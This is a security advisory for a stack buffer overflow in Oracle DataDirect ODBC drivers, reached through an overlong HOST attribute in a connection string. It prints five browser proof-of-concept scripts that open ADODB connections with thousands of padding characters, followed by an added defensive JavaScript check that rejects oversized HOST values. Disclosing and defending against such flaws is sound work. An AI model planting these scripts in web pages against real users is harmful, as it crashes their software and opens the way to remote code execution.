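Affected systems:
Oracle DataDirect
Oracle Hyperion Performance Management and BI 11.1.2.1.0
Description:
BUGTRAQ ID: 50305
Oracle DataDirect is a high-performance commercial data access component.
Oracle DataDirect installs several drivers that allow software to retrieve information from ODBC data sources. Some of these products contain a remote stack buffer overflow: when an overlong HOST attribute is specified in the connection string, the vulnerability can be triggered while arsqls24.dll performs a Unicode/ASCII conversion.
<*Source: rgod (rgod@autistici.org)
Link: http://www.securityfocus.com/archive/1/520169
*>
Test method:
Warning
The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use it at your own risk!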
<script>
var obj = new ActiveXObject("ADODB.Connection");
x="";
for (i=0;i<666;i++){x = x + "AAAA"}
obj.ConnectionString ="DRIVER=DataDirect 6.0 SQL Server Native Wire Protocol;HOST=" + x + ";IP=127.0.0.1;PORT=9;DB=xxxxxx;UID=sa;PWD=null";
obj.Open();
</script>

<!-- saved from url=(0014)about:internet -->
<script>
var obj = new ActiveXObject("ADODB.Connection");
x="";
for (i=0;i<1666;i++){x = x + "AAAA"}
obj.ConnectionString ="DRIVER=DataDirect 6.0 Greenplum Wire Protocol;HOST=" + x + ";IP=127.0.0.1;PORT=9;DB=DB2DATA;UID=sa;PWD=null";
obj.Open();
</script>

<!-- saved from url=(0014)about:internet -->
<script>
var obj = new ActiveXObject("ADODB.Connection");
x="";
for (i=0;i<1666;i++){x = x + "AAAA"}
obj.ConnectionString ="DRIVER=DataDirect 6.0 Informix Wire Protocol;HOST=" + x + ";IP=127.0.0.1;PORT=9;DB=DB2DATA;UID=sa;PWD=null";
obj.Open();
</script>

<!-- saved from url=(0014)about:internet -->
<script>
var obj = new ActiveXObject("ADODB.Connection");
x="";
for (i=0;i<1666;i++){x = x + "AAAA"}
obj.ConnectionString ="DRIVER=DataDirect 6.0 PostgreSQL Wire Protocol;HOST=" + x +";UID=system;PWD=XXXXXXXXX;";
obj.Open();
</script>

<!-- saved from url=(0014)about:internet -->
<script>
var obj = new ActiveXObject("ADODB.Connection");
x="";
for (i=0;i<700;i++){x = x + "AAAA"}
obj.ConnectionString ="DRIVER=DataDirect 6.0 MySQL Wire Protocol;HOST=" + x + ";IP=127.0.0.1;PORT=9;DB=DB2DATA;UID=sa;PWD=null";
obj.Open();
</script>

//0.07 20/10/2011 – rgod
original url: http://retrogod.altervista.org/9sg_oracle_datadirect.htm
Recommendation:
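Because the overflow is reached through an overlong HOST attribute, an application that assembles ODBC connection strings from untrusted input can refuse oversized HOST values before the string reaches the driver. The following is an added example, not code from the original advisory or from Oracle; the function names are hypothetical and the 253-character limit is an assumption based on the maximum length of a DNS name.

```javascript
// Added example (not from the advisory): reject overlong HOST attributes.
const MAX_HOST_LEN = 253; // assumption: DNS name limit, not a vendor figure

// Simplified ODBC-style parser: KEY=value;KEY={value with ; inside};...
// Inside braces ';' is literal and '}}' stands for one '}'.
function parseConnectionString(cs) {
  const pairs = [];
  let i = 0;
  while (i < cs.length) {
    const eq = cs.indexOf("=", i);
    const semi = cs.indexOf(";", i);
    if (eq === -1) break;                                     // no more KEY=value
    if (semi !== -1 && semi < eq) { i = semi + 1; continue; } // segment without '='
    const key = cs.slice(i, eq).trim().toUpperCase();
    let j = eq + 1, value = "";
    while (cs[j] === " ") j++;                                // blanks before the value
    const braced = cs[j] === "{";
    if (braced) {
      for (j++; j < cs.length; j++) {
        if (cs[j] === "}") {
          if (cs[j + 1] !== "}") break;                       // closing brace
          j++;                                                // '}}' -> literal '}'
        }
        value += cs[j];
      }
      j++;                                                    // step past the closing brace
    }
    const end = cs.indexOf(";", j);
    const stop = end === -1 ? cs.length : end;
    if (!braced) value = cs.slice(j, stop).trim();
    pairs.push([key, value]);
    i = stop + 1;
  }
  return pairs;
}

// Every HOST occurrence is checked, so a long duplicate cannot hide behind a short one.
function checkConnectionString(cs) {
  const reasons = [];
  for (const [key, value] of parseConnectionString(cs)) {
    if (key === "HOST" && value.length > MAX_HOST_LEN) {
      reasons.push(`HOST is ${value.length} chars (limit ${MAX_HOST_LEN})`);
    }
  }
  return { ok: reasons.length === 0, reasons };
}

// Constructed sample inputs.
const okCs = "DRIVER=DataDirect 6.0 PostgreSQL Wire Protocol;HOST=db01.example.internal;UID=app";
const longCs = "DRIVER=DataDirect 6.0 PostgreSQL Wire Protocol;HOST=db01;host={" + "h".repeat(300) + "}";
console.log(checkConnectionString(okCs).ok, checkConnectionString(longCs).reasons);
```

Call `checkConnectionString` before assigning the string to the connection object and refuse to open the connection when `ok` is false.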
Vendor patch:
Oracle
——
The vendor has not yet released a patch or upgrade. We recommend that users of this software watch the vendor's home page for the latest version: